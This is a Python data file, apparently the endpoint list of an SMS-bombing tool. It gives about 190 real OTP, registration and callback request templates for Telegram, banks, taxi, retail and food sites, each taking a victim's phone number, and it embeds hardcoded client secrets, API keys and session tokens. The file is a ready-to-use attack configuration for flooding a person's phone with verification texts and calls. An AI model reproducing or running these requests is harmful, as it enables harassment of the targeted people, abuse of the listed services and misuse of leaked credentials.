# its all fucking services.

sms_services = [
    {"name":"my.telegram.org","url":"https://my.telegram.org/auth/send_password","data":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"pizzahut.ru","url":"https://pizzahut.ru/account/password-reset","data":"{'reset_by':'phone','action_id':'pass-recovery','phone':'%phone5%','_token':'*'}","method":"POST"},
    {"name":"qiwi.com","url":"https://mobile-api.qiwi.com/oauth/authorize","data":"{'response_type':'urn:qiwi:oauth:response-type:confirmation-id','username':'%phone%','client_id':'android-qw','client_secret':'zAm4FKq9UnSe7id'}","method":"POST"},
    {"name":"rabota.ru","url":"https://www.rabota.ru/remind","data":"{'credential':'%phone%'}","method":"POST"},
    {"name":"comfy.ua","url":"https://comfy.ua/ua/customer/account/createPost","data":"{'registration_name':'%name%','registration_phone':'%phone%','registration_email':'%email%'}","method":"POST"},
    {"name":"rutube.ru","url":"https://rutube.ru/api/accounts/sendpass/phone","data":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"3040.com.ua","url":"https://3040.com.ua/taxi-ordering","data":"{'callback-phone':'+%phone%'}","method":"POST"},
    {"name":"alfalife.cc","url":"https://alfalife.cc/auth.php","data":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"allo.ua","url":"https://allo.ua/ua/customer/account/createPostVue/","data":"{'firstname':'%name%','telephone':'%phone%','email':'%email%','password':'%password%','form_key':'Zqqj7CyjkKG2ImM8'}","method":"POST"},
    {"name":"citilink.ru","url":"https://www.citilink.ru/registration/confirm/phone/+%phone%/","method":"GET"},
    {"name":"sportmaster.ua","url":"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone=+%phone%","method":"GET"},
    {"name":"oyorooms.com","url":"https://www.oyorooms.com/api/pwa/generateotp?phone=+%phone%&country_code=%2B7&nod=4&locale=en","method":"GET"},
    {"name":"secure.online.ua","url":"https://secure.online.ua/ajax/check_phone/?reg_phone=%phone%","method":"GET"},
    {"name":"pampik.com","url":"https://pampik.com/callback","data":"{'phoneCallback':'%phone%'}","method":"POST"},
    {"name":"junker.kiev.ua","url":"https://junker.kiev.ua/postmaster.php","data":"{'tel':'%phone%','name':'%name%','action':'callme'}","method":"POST"},
    {"name":"pestocafe.ua","url":"https://www.pestocafe.ua/apply-form/callback","data":"{'name':'%name%','phone':'%phone%','_token':'%token%'}","method":"POST"},
    {"name":"mobileplanet.ua (reg)","url":"https://mobileplanet.ua/register","data":"{'klient_name':'%name%','klient_phone':'+%phone%','klient_email':'%email%'}","method":"POST"},
    {"name":"mobileplanet.ua (callback)","url":"https://mobileplanet.ua/new_record","data":"{'klient_name':'%name%','klient_phone':'+%phone%','object':'callback','this_page_url':'https://mobileplanet.ua/telefony-349'}","method":"POST"},
    {"name":"advice.in.ua","url":"http://www.advice.in.ua/vasha-zayavka-prinyata.html/","data":"{'fio':'%name%','tel':'%phone%','type':'2','capch':'4','mod':'1'}","method":"POST"},
    {"name":"holdyou.net","url":"https://holdyou.net/api/callback","data":"{'name':'%name%','phone':'%phone%'}","method":"POST"},
    {"name":"city24.ua","url":"https://city24.ua/personalaccount/account/registration","data":"{'PhoneNumber':'%phone%'}","method":"POST"},
    {"name":"dianet.com.ua","url":"https://my.dianet.com.ua/send_sms/","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"easypay.ua","url":"https://api.easypay.ua/api/auth/register","data":"{'phone':'%phone%','password':'%password%'}","method":"POST"},
    {"name":"edostav.ru","url":"https://vladimir.edostav.ru/site/CheckAuthLogin","data":"{'phone_or_email':'+%phone%'}","method":"POST"},
    {"name":"eldorado.ua","url":"https://api.eldorado.ua/v1/sign?login=%phone%&step=phone-check&fb_id=null&fb_token=null&lang=ru","method":"GET"},
    {"name":"etm.ru","url":"https://www.etm.ru/cat/runprog.html","data":"{'m_phone':'%phone%','mode':'sendSms','syf_prog':'clients-services','getSysParam':'yes'}","method":"POST"},
    {"name":"finam.ru","url":"https://www.finam.ru/api/smslocker/sendcode","data":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"fix-price.ru","url":"https://fix-price.ru/ajax/register_phone_code.php","data":"{'phone':'+%phone%','action':'getCode','register_call':'Y'}","method":"POST"},
    {"name":"foodband.ru","url":"https://foodband.ru/api?phone=%phone%&call=customers/sendVerificationCode&g-recaptcha-response=","method":"POST"},
    {"name":"friendsclub.ru","url":"https://friendsclub.ru/assets/components/pl/connector.php","data":"{'MobilePhone':'+%phone%','casePar':'authSendsms'}","method":"POST"},
    {"name":"getmancar.com.ua","url":"https://crm.getmancar.com.ua/api/veryfyaccount","json":"{'phone':'+%phone%','grant_type':'password','client_id':'gcarAppMob','client_secret':'SomeRandomCharsAndNumbersMobile'}","method":"POST"},
    {"name":"hatimaki.ru","url":"https://www.hatimaki.ru/register/","data":"{'REGISTER[LOGIN]':'%phone%','REGISTER[PERSONAL_PHONE]':'%phone%','REGISTER[SMS_CODE]':'','resend-sms':'1','REGISTER[EMAIL]':'%email%','register_submit_button':'Зарегистрироваться'}","method":"POST"},
    {"name":"helsi.me","url":"https://helsi.me/api/healthy/accounts/login","data":"{'phone':'%phone%','platform':'PISWeb'}","method":"POST"},
    {"name":"hmara.tv","url":"https://api.hmara.tv/stable/entrance?contact=%phone%","method":"GET"},
    {"name":"imgur.com","url":"https://api.imgur.com/account/v1/phones/verify","data":"{'phone_number':'%phone%','region_code':'RU'}","method":"POST"},
    {"name":"indriverapp.com","url":"https://terra-1.indriverapp.com/api/authorization?locale=ru","data":"{'phone':'+%phone%','mode':'request','phone_permission':'unknown','stream_id':0,'v':3,'appversion':'3.20.6','osversion':'unknown','devicemodel':'unknown'}","method":"POST"},
    {"name":"informatics.yandex","url":"https://informatics.yandex/api/v1/registration/confirmation/phone/send/","data":"{'phone':'%phone%','csrfmiddlewaretoken':'','country':{'7':'RU','380':'UA','375':'BE'}}","method":"POST"},
    {"name":"invitro.ru","url":"https://lk.invitro.ru/sp/mobileApi/createUserByPassword","data":"{'login':'+%phone%','password':'%password%','application':'lkp'}","method":"POST"},
    {"name":"izi.ua (reg)","url":"https://izi.ua/api/auth/register","json":"{'phone':'+%phone%','name':'%name%','is_terms_accepted':true}","method":"POST"},
    {"name":"izi.ua (login)","url":"https://izi.ua/api/auth/sms-login","json":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"kaspi.kz","url":"https://kaspi.kz/util/send-app-link","data":"{'address':'%phone%'}","method":"POST"},
    {"name":"kinoland.com.ua","url":"https://api.kinoland.com.ua/api/v1/service/send-sms","json":"{'Phone':'%phone%','Type':1}","headers":{"Agent":"website"},"method":"POST"},
    {"name":"koronapay.com","url":"https://koronapay.com/transfers/online/api/users/otps","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"loany.com.ua","url":"https://loany.com.ua/funct/ajax/registration/code","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"logistictech.ru","url":"https://api-rest.logistictech.ru/api/v1.1/clients/request-code","data":"{'phone':'%phone%'}","headers":{"Restaurant-chain":"c0ab3d88-fba8-47aa-b08d-c7598a3be0b9"},"method":"POST"},
    {"name":"makarolls.ru","url":"https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php","data":"{'data':'%phone%','metod':'postreg'}","method":"POST"},
    {"name":"menu.ua (reg)","url":"https://www.menu.ua/kiev/delivery/registration/direct-registration.html","data":"{'user_info[phone]':'%phone%','user_info[fullname]':'%name%','user_info[email]':'%email%','user_info[password]':'ndD34f!dfg#','user_info[conf_password]':'ndD34f!dfg#'}","method":"POST"},
    {"name":"menu.ua (verify)","url":"https://www.menu.ua/kiev/delivery/profile/show-verify.html","data":"{'phone':'%phone%','do':'phone'}","method":"POST"},
    {"name":"menza-cafe.ru","url":"https://menza-cafe.ru/system/call_me.php","data":"{'phone':'%phone%','phone_number':'1','fio':'%name%'}","method":"POST"},
    {"name":"mistercash.ua","url":"https://my.mistercash.ua/ru/send/sms/registration?number=+%phone%","method":"GET"},
    {"name":"modulbank.ru","url":"https://my.modulbank.ru/api/v2/registration/nameAndPhone","json":"{'CellPhone':'%phone%','FirstName':'%name%','Package':'optimal'}","method":"POST"},
    {"name":"monobank.com.ua","url":"https://www.monobank.com.ua/api/mobapplink/send","data":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"mos.pizza","url":"https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php","data":"{'phone':'%phone%','name':'%name%'}","method":"POST"},
    {"name":"moyo.ua","url":"https://www.moyo.ua/identity/registration","data":"{'phone':'%phone%','firstname':'%name%','email':'%email%'}","method":"POST"},
    {"name":"mts.ru (tvh)","url":"https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code?msisdn=%phone%","method":"GET"},
    {"name":"multiplex.ua","url":"https://auth.multiplex.ua/login","json":"{'login':'%phone%'}","method":"POST"},
    {"name":"my.games","url":"https://account.my.games/signup_send_sms/","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"niyama.ru","url":"https://www.niyama.ru/ajax/sendSMS.php","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"nl.ua","url":"https://www.nl.ua","data":"{'phone':'%phone%','method':'sendCode','registration':'N','sessid':'bf70db951f54b837748f69b75a61deb4','component':'bxmaker.authuserphone.login'}","method":"POST"},
    {"name":"nn-card.ru","url":"https://nn-card.ru/api/1.0/covid/login","json":"{'phone':'%phone%'}","method":"POST"},
    {"name":"piroginomerodin.ru","url":"https://piroginomerodin.ru/index.php?route=sms/login/sendreg","data":"{'telephone':'+%phone%'}","method":"POST"},
    {"name":"pizzakazan.com","url":"https://pizzakazan.com/auth/ajax.php","data":"{'phone':'+%phone%','method':'sendCode'}","method":"POST"},
    {"name":"pizzasinizza.ru","url":"https://pizzasinizza.ru/api/phoneCode.php","json":"{'phone':'%phone%'}","method":"POST"},
    {"name":"planetakino.ua","url":"https://cabinet.planetakino.ua/service/sms?phone=%phone%","method":"GET"},
    {"name":"prosushi.ru","url":"https://www.prosushi.ru/php/profile.php","data":"{'phone':'+%phone%','mode':'sms'}","method":"POST"},
    {"name":"qlean.ru","url":"https://sso.cloud.qlean.ru/http/users/requestotp?phone=%phone%&clientId=undefined&sessionId=4224","headers":{"Referer":"https://qlean.ru/sso?redirectUrl=https://qlean.ru/"},"method":"GET"},
    {"name":"raiffeisen.ru","url":"https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code?number=%phone%","method":"GET"},
    {"name":"richfamily.ru","url":"https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php","data":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"rieltor.ua","url":"https://rieltor.ua/api/users/register-sms/","data":"{'phone':'%phone%','retry':0}","method":"POST"},
    {"name":"rutaxi.ru","url":"https://rutaxi.ru/ajax_auth.html","data":"{'1':'%phone%','c':'3'}","method":"POST"},
    {"name":"sayoris.ru","url":"https://sayoris.ru/?route=parse/whats","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"shopandshow.ru","url":"https://shopandshow.ru/sms/password-request/","data":"{'phone':'+%phone%','resend':0}","method":"POST"},
    {"name":"smart.space","url":"https://smart.space/api/users/request_confirmation_code/","json":"{'mobile':'+%phone%','action':'confirm_mobile'}","method":"POST"},
    {"name":"sms4b.ru","url":"https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php","data":"{'demo_number':'+%phone%','ajax_demo_send':'1'}","method":"POST"},
    {"name":"suandshi.ru","url":"https://suandshi.ru/mobile_api/register_mobile_user?phone=%phone%","method":"GET"},
    {"name":"sushifuji.ru","url":"https://sushifuji.ru/sms_send_ajax.php","data":"{'phone':'%phone%','name':'false'}","method":"POST"},
    {"name":"sushi-master.ru","url":"https://client-api.sushi-master.ru/api/v1/auth/init","json":"{'phone':'%phone%'}","method":"POST"},
    {"name":"sushi-profi.ru","url":"https://www.sushi-profi.ru/api/order/order-call/","json":"{'phone':'%phone%','name':'%name%'}","method":"POST"},
    {"name":"tabasko.su","url":"https://tabasko.su/","data":"{'LOGIN':'%phone%','ACTION':'GET_CODE','COMPONENT_NAME':'AUTH','IS_AJAX':'Y'}","method":"POST"},
    {"name":"tabris.ru","url":"https://lk.tabris.ru/reg/","data":"{'phone':'%phone%','action':'phone'}","method":"POST"},
    {"name":"tarantino-family.com","url":"https://www.tarantino-family.com/wp-admin/admin-ajax.php","data":"{'phone':'%phone%','action':'callback_phonenumber'}","method":"POST"},
    {"name":"taxi-ritm.ru","url":"https://taxi-ritm.ru/ajax/ppp/ppp_back_call.php?URL=/","data":"{'BACK_CALL_PHONE':'%phone%','RECALL':'Y'}","method":"POST"},
    {"name":"tele2.ru","url":"https://msk.tele2.ru/api/validation/number/%phone%","json":"{'sender':'Tele2'}","method":"POST"},
    {"name":"thehive.pro","url":"https://thehive.pro/auth/signup","json":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"tiktok.com","url":"https://m.tiktok.com/node/send/download_link","json":"{'Mobile':'%phone%','PhoneRegin':'UA','language':'en','slideVerify':0,'page':{'af_adset_id':0,'pid':0}}","method":"POST"},
    {"name":"tvoyaapteka.ru","url":"https://www.tvoyaapteka.ru/bitrix/ajax/form_user_new.php?confirm_register=1","data":"{'tel':'+%phone%','change_code':1}","method":"POST"},
    {"name":"uklon.com.ua","url":"https://uklon.com.ua/api/v1/account/code/send","json":"{'phone':'%phone%'}","headers":{"client_id":"6289de851fc726f887af8d5d7a56c635"},"method":"POST"},
    {"name":"partner.uklon.com.ua","url":"https://partner.uklon.com.ua/api/v1/registration/sendcode","json":"{'phone':'%phone%'}","headers":{"client_id":"6289de851fc726f887af8d5d7a56c635"},"method":"POST"},
    {"name":"doma.uchi.ru (call)","url":"https://app.doma.uchi.ru/api/v1/parent/signup_start","json":"{'phone':'+%phone%','first_name':'-','utm_data':{},'via':'call'}","method":"POST"},
    {"name":"doma.uchi.ru (sms)","url":"https://app.doma.uchi.ru/api/v1/parent/signup_start","json":"{'phone':'+%phone%','first_name':'-','utm_data':{},'via':'sms'}","method":"POST"},
    {"name":"utair.ru","url":"https://b.utair.ru/api/v1/login/","data":"{'login':'+%phone%'}","method":"POST"},
    {"name":"vezitaxi.com","url":"https://vezitaxi.com/api/employment/getsmscode?phone=+%phone%&city=561&callback=jsonp_callback_35979","method":"GET"},
    {"name":"visa.ru","url":"https://pay.visa.ru/api/Auth/code/request","data":"{'phoneNumber':'+%phone%'}","method":"POST"},
    {"name":"vsk.ru","url":"https://shop.vsk.ru/ajax/auth/postSms/","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"iconjob.co","url":"https://api.iconjob.co/api/auth/verification_code","json":"{'phone':'%phone%'}","method":"POST"},
    {"name":"wowworks.ru","url":"https://api.wowworks.ru/v2/site/send-code","json":"{'phone':'%phone%','type':2}","method":"POST"},
    {"name":"cleversite.ru","url":"https://clients.cleversite.ru/callback/run.php","data":"{'num':'%phone%','siteid':'62731','title':'Онлайн-консультант','referrer':'https://m.cleversite.ru/call'}","method":"POST"},
    {"name":"doc.ua","url":"https://doc.ua/main/callbackrequest","data":"{'crm_models_SupportRequest[user_name]':'%name%','crm_models_SupportRequest[user_phone]':'%phone%','crm_models_SupportRequest[link]':'https://doc.ua/doctors/kiev/all/psiholog'}","method":"POST"},
    {"name":"cloudloyalty.ru","url":"https://app.cloudloyalty.ru/demo/send-code","json":"{'country':2,'phone':'%phone%','roistatVisit':47637,'experiments':{'new_header_title':'1'}}","method":"POST"},
    {"name":"mtstv.ru","url":"https://api.mtstv.ru/v1/users","json":"{'msisdn':'%phone%'}","method":"POST"},
    {"name":"cian.ru","url":"https://api.cian.ru/sms/v1/send-validation-code/","json":"{'phone':'+%phone%','type':'authenticateCode'}","method":"POST"},
    {"name":"ennergiia.com","url":"https://api.ennergiia.com/auth/api/development/lor","json":"{'referrer':'ennergiia','via_sms':true,'phone':'+%phone%'}","method":"POST"},
    {"name":"sbis.ru","url":"https://online.sbis.ru/reg/service/","json":"{'firstName':'%name%','middleName':'%name%','lastName':'%name%','sex':'1','birthDate':'7.9.1997','mobilePhone':'%phone%','russianFederationResident':'true','isDSA':'false','personalDataProcessingAgreement':'true','bKIRequestAgreement':'null','promotionAgreement':'true'}","method":"POST"},
    {"name":"tehnosvit.ua","url":"https://tehnosvit.ua/iwantring_feedback.html","data":"{'feedbackName':'%name%','feedbackPhone':'+%phone%'}","method":"POST"},
    {"name":"grabtaxi.com","url":"https://p.grabtaxi.com/api/passenger/v2/profiles/register","data":"{'phoneNumber':'%phone%','countryCode':'ID','name':'test','email':'%email%','deviceToken':'*'}","method":"POST"},
    {"name":"rutaxi.ru (keycode)","url":"https://moscow.rutaxi.ru/ajax_keycode.html","data":"{'1':'%phone%'}","method":"POST"},
    {"name":"tinkoff.ru","url":"https://api.tinkoff.ru/v1/sign_up","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"citrus.ua","url":"https://my.citrus.ua/api/v2/register","data":"{'email':'%email%','name':'%name%','phone':'%phone%','password':'!@#qwe','confirm_passwor':'!@#qwe'}","method":"POST"},
    {"name":"youla.ru","url":"https://youla.ru/web-api/auth/request_code","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"smsint.ru","url":"https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php","data":"{'name':'%name%','phone':'%phone%','promo':'yellowforma'}","method":"POST"},
    {"name":"invitro.ru (refresh)","url":"https://lk.invitro.ru/lk2/lka/patient/refreshCode","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"beltelecom.by","url":"https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"karusel.ru","url":"https://app.karusel.ru/api/v1/phone/","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"kfc.ru","url":"https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms","json":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"icq.com","url":"https://www.icq.com/smsreg/requestPhoneValidation.php","data":"{'msisdn':'%phone%','locale':'en','countryCode':'ru','version':'1','k':'ic1rtwz1s1Hj1O0r','r':'46763'}","method":"POST"},
    {"name":"pmsm.org.ru (iqos)","url":"https://ube.pmsm.org.ru/esb/iqos-phone/validate","json":"{'phone':'%phone%'}","method":"POST"},
    {"name":"ivi.ru","url":"https://api.ivi.ru/mobileapi/user/register/phone/v6","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"mail.ru","url":"https://cloud.mail.ru/api/v2/notify/applink","json":"{'phone':'+%phone%','api':2,'email':'email','x-email':'x-email'}","method":"POST"},
    {"name":"plink.tech","url":"https://plink.tech/register/","json":"{'phone':'%phone%'}","method":"POST"},
    {"name":"gotinder.com","url":"https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru","data":"{'phone_number':'%phone%'}","method":"POST"},
    {"name":"wi-fi.ru","url":"https://cabinet.wi-fi.ru/api/auth/by-sms","data":"{'msisdn':'%phone%'}","headers":{"App-ID":"cabinet"},"method":"POST"},
    {"name":"alpari.com","url":"https://alpari.com/api/en/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/","json":"{'mobile_phone':'%phone%','email':'%email%','client_type':'personal','deliveryOption':'sms'}","headers":{"Referer":"https://alpari.com/en/registration/"},"method":"POST"},
    {"name":"buzzolls.ru","url":"https://it.buzzolls.ru:9995/api/v2/auth/register?phoneNumber=+%phone%","headers":{"keywordapi":"ProjectVApiKeyword","usedapiversion":"3"},"method":"POST"},
    {"name":"kasta.ua","url":"https://kasta.ua/api/v2/login/","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"benzuber.ru","url":"https://app.benzuber.ru/login","data":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"bamper.by","url":"https://bamper.by/registration/?step=1","data":"{'phone':'+%phone%','submit':'Запросить смс подтверждения','rules':'on'}","method":"POST"},
    {"name":"707taxi.com.ua","url":"https://707taxi.com.ua/sendSMS.php","data":"{'tel':'%phone%'}","method":"POST"},
    {"name":"protovar.com.ua","url":"https://protovar.com.ua/aj_record","data":"{'object':'callback','user_name':'%name%','contact_phone':'%phone%'}","method":"POST"},
    {"name":"e-vse.online","url":"https://e-vse.online/mail2.php","data":"{'object':'callback','user_name':'%name%','contact_phone':'+%phone%'}","method":"POST"},
    {"name":"eda.yandex","url":"https://eda.yandex/api/v1/user/request_authentication_code","json":"{'phone_number':'+%phone%'}","method":"POST"},
    {"name":"chef.yandex","url":"https://api.chef.yandex/api/v2/auth/sms","json":"{'phone':'%phone%'}","method":"POST"},
    {"name":"twitch.tv","url":"https://passport.twitch.tv/register?trusted_request=true","json":"{'birthday':{'day':17,'month':10,'year':1998},'client_id':'qb1unb4b2q4t58fwldcbz2nnm46a8zp','include_verification_code':true,'password':'%password%','phone_number':'%phone%','username':'%name%'}","method":"POST"},
    {"name":"sunlight.net","url":"https://api.sunlight.net/v3/customers/authorization/","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"sipnet.ru","url":"https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?phone=+%phone%&callmode=1&oper=9","method":"GET"},
    {"name":"ozon.ru","url":"https://www.ozon.ru/api/composer-api.bx/_action/fastEntry","json":"{'phone':'%phone%','otpId':0}","method":"POST"},
    {"name":"ok.ru (anon)","url":"https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone","data":"{'st.r.phone':'+%phone%'}","method":"POST"},
    {"name":"lenta.com","url":"https://lenta.com/api/v1/authentication/requestValidationCode","json":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"guru.taxi","url":"https://guru.taxi/api/v1/driver/session/verify","json":"{'phone':{'code':1,'number':'%phone%'}}","method":"POST"},
    {"name":"findclone.ru","url":"https://findclone.ru/register?phone=+%phone%","method":"GET"},
    {"name":"delitime.ru","url":"https://api.delitime.ru/api/v2/signup","data":"{'SignupForm[username]':'%phone%','SignupForm[device_type]':3}","method":"POST"},
    {"name":"carsmile.com","url":"https://api.carsmile.com/","json":"{'operationName':'enterPhone','variables':{'phone':'%phone%'},'query':'mutation enterPhone($phone:String!){enterPhone(phone:$phone)}'}","method":"POST"},
    {"name":"mtsbank.ru","url":"https://sso.mtsbank.ru/api/v2/login","json":"{'login':'%phone%'}","method":"POST"},
    {"name":"winelab.ru","url":"https://www.winelab.ru/confirmation/sendByPhone","params":{"number":"%winelab%"},"method":"GET"},
    {"name":"profi.ru","url":"https://spb.profi.ru/graphql","json":{"query":"...","variables":{"type":"phone","initialState":{"phoneNumber":"%profi%","defaultOrderCityId":"prfr","currentHost":"https://profi.ru"}}},"method":"POST"},
    {"name":"chitai-gorod.ru","url":"https://web-gate.chitai-gorod.ru/api/v1/auth/code","json":{"phone":"%phone%","cgsing":{"type":"reCaptcha","payload":{"token":"...","action":"getSMSCode","version":"rv3"}}},"method":"POST"},
    {"name":"verifykit.com","url":"https://widget.verifykit.com/v2.1/otp-start?token=dma6839823b8e9ceeb7ba5e4d7987db521f71d5f12ff44b2372da1deac246","data":"{'countryCode':'RU','isMobileBrowser':'0','phoneOperatingSystem':'android','phoneNumber':'+%phone%'}","method":"POST"},
    {"name":"paypal.com","url":"https://www.paypal.com/KZ/welcome/signup","json":{"/appData/action":"init_phone_confirmation","/initiatePhoneConfirmData/sendSms":"yes","/initiatePhoneConfirmData/phoneNumber":"%phone%","/initiatePhoneConfirmData/phoneCountryCode":"7"},"method":"POST"},
    {"name":"raiffeisen.ru (sms)","url":"https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code/sms","json":{"number":"%phone%"},"method":"POST"},
    {"name":"madyart.ru","url":"https://madyart.ru/local/aut.php","data":"{'wct_reg_fio':'Пупкин','wct_reg_fio2':'Василий','wct_reg_phone':'%madyart%','wct_reg_ch':'Y','wct_reg_3':'1','wc_phone_psw':'sdfgwse5rgfdzvbsedf','wc_phone_psw2':'sdfgwse5rgfdzvbsedf'}","method":"POST"},
    {"name":"growfood.pro","url":"https://admin.growfood.pro/api/personal-cabinet/v2_0/authentication/send-sms","json":{"client":{"phone":"%growfood%","cityId":2}},"method":"POST"},
    {"name":"letu.ru","url":"https://www.letu.ru/s/api/user/account/v1/verifications/phone","params":{"pushSite":"storeMobileRU","phone":"%letu%"},"method":"GET"},
    {"name":"evraz.market","url":"https://spb.evraz.market/bitrix/services/main/ajax.php?action=evraz:main.api.auth.sendsms","data":"{'userPhone':'%letu%','sessid':'ce46266c9ca3de6414e13d163615c827'}","method":"POST"},
    {"name":"abc.ru","url":"https://abc.ru/clientapi/v1/user/phone-sms/","json":{"phone":"+ %phone%","country_id":1,"scenario":"registration"},"method":"POST"},
    {"name":"mosmetro.ru","url":"https://auth.mosmetro.ru/api/auth/login/sms","json":{"login":"%phone%","returnUrl":"..."},"method":"POST"},
    {"name":"uteka.ru","url":"https://spb.uteka.ru/rpc/?method=auth.GetCode","json":{"jsonrpc":"2.0","id":8,"method":"auth.GetCode","params":{"phone":"%phone%","mustExist":false,"sendRealSms":true}},"method":"POST"},
    {"name":"elementaree.ru","url":"https://api-new.elementaree.ru/graphql","json":{"operationName":"phoneVerification","variables":{"phone":"%phone%"}},"method":"POST"},
    {"name":"lenta.com (online)","url":"https://moscow.online.lenta.com/jrpc","json":{"method":"authCodeSend","params":{"phone":"%phone%"}},"method":"POST"},
    {"name":"auchan.ru","url":"https://www.auchan.ru/v1/cmd/clientprofile/checkphone","headers":{"phone":"%phone%"},"method":"GET"},
    {"name":"victoria-group.ru","url":"https://lk.victoria-group.ru/identity/registration","json":{"MobilePhone":"+ %phone%","AgreeToTerms":1,"AllowNotification":0},"method":"POST"},
    {"name":"svyaznoy.ru","url":"https://www.svyaznoy.ru/api/v2/sms-verification-code/%phone%","method":"POST"},
    {"name":"onetwotrip.com","url":"https://www.onetwotrip.com/_auth/profile/phone/with-confirm","json":{"phone":"+ %phone%","reseller":""},"method":"PATCH"},
    {"name":"x5.ru","url":"https://id.x5.ru/graphql","json":{"query":"{ user_credentials(login:\"%phone%\") {login}}"},"method":"POST"},
    {"name":"zaymigo.com","url":"https://borrow.zaymigo.com/rpc/v1","json":{"method":"create","params":{"borrower":{"phone":"+ %phone%"}}},"method":"POST"},
    {"name":"adengi.ru","url":"https://adengi.ru/rest/v1/registration/code/send","json":{"phone":"%phone%","via":"sms"},"method":"POST"},
    {"name":"zdorov.ru","url":"https://zdorov.ru/backend/api/customer/confirm","json":{"phone":"%phone%","deviceId":"...","term":2},"method":"POST"},
    {"name":"sokolov.ru","url":"https://sokolov.ru/api/v4/profile/user/send-code","json":{"data":{"type":"login","attributes":{"phone":"%phone%"}}},"method":"POST"},
    {"name":"tsum.ru","url":"https://api.tsum.ru/v2/authorize/request-sms","json":{"data":{"type":"requestSMS","attributes":{"phone":"+ %phone%"}}},"method":"POST"},
    {"name":"auto.ru","url":"https://auth.auto.ru/-/ajax/auth/","json":{"items":[{"path":"auth/login-or-register","params":{"phone":"%phone%"}}]},"method":"POST"},
    {"name":"yandex.ru (reg)","url":"https://passport.yandex.ru/registration-validations/password","data":"...","method":"POST"},
    {"name":"shoppinglive.ru","url":"https://www.shoppinglive.ru/phone-verification/send-code","data":"{'mobilePhone':'%phone%'}","method":"POST"},
    {"name":"leomax.ru","url":"https://ap.leomax.ru/siteapi/auth/authcode","json":{"phone":"+ %phone%"},"method":"POST"},
    {"name":"frotels.com","url":"https://www.frotels.com/appsendsms.php","data":"{'mobno':'%phone%'}","method":"POST"},
    {"name":"wheely.com","url":"https://api.wheely.com/v6/auth/oauth/token","json":{"app_id":"55e085968a5da59241000001","phone":"+ %phone%"},"method":"POST"},
    {"name":"icq.net","url":"https://u.icq.net/api/v89/rapi/auth/sendCode","json":{"params":{"phone":"%phone%","route":"sms"}},"method":"POST"},
    {"name":"sravni.ru","url":"https://my.sravni.ru/signin/code","data":"{'phone':'+%phone%'}","method":"POST"},
    {"name":"vprok.ru","url":"https://www.vprok.ru/as_send_pin","data":"{'phone':'%phone%'}","method":"POST"},
    {"name":"aliexpress.ru","url":"https://aliexpress.ru/aer-api/v2/bx/auth/v1/web/register/phone/init","json":"...","method":"POST"},
    {"name":"fon.bet","url":"https://clientsapi03w.bk6bba-resources.com/cps/superRegistration/createProcess","json":"...","method":"POST"},
    {"name":"myacuvuepro.ru","url":"https://api.myacuvuepro.ru/myacuvue/oauth/mobile","json":{"phoneNumber":"%phone%"},"method":"POST"},
    {"name":"smartseeds.ru","url":"https://smartseeds.ru/api/native/v1.0/cargo-owner/validate","json":"...","method":"POST"},

    {"name":"green-market.by","url":"https://www.green-market.by/registration_send_sms_code","data":"{'phone':'*green*'}","headers":{"x-csrf-token":"KcNE5q8qTeuPARJLwF0ZJaY8L0sPHU6BMLB5fRP3","x-requested-with":"XMLHttpRequest"},"response":200,"timeout":60},
    {"name":"sosedi.by","url":"https://sosedi.by/local/api/smsSend.php","json":"{'phone':'*sosedi*'}","response":200,"timeout":60},
    {"name":"av.by","url":"https://api.av.by/auth/phone/sign-up","json":"{\"name\":\"Олег\",\"password\":\"HifbWy523i46oO\",\"phone\":{\"country\":1,\"number\":\"*-phone*\"},\"userEula\":{\"accepted\":true}}","response":204,"timeout":60},
    {"name":"carte.by","url":"https://carte.by/auth/","data":"{'ajax':'register','login':'Olegkiller229','pass':'CbivnE5316','phone':'*+phone*','code':'','company':0,'resend':1,'checksum':675}","response":200,"timeout":30},
    {"name":"delivio.by","url":"https://delivio.by/be/api/register","json":"{'phone':'*+phone*'}","response":201,"timeout":60},
    {"name":"marko.by","url":"https://www.marko.by/ajax/registerSendConfirmCode.php","data":"{'form_data':'first_name=&last_name=&email=&phone=*green*&sms_code=&password=&password_confirm='}","response":200,"timeout":60},
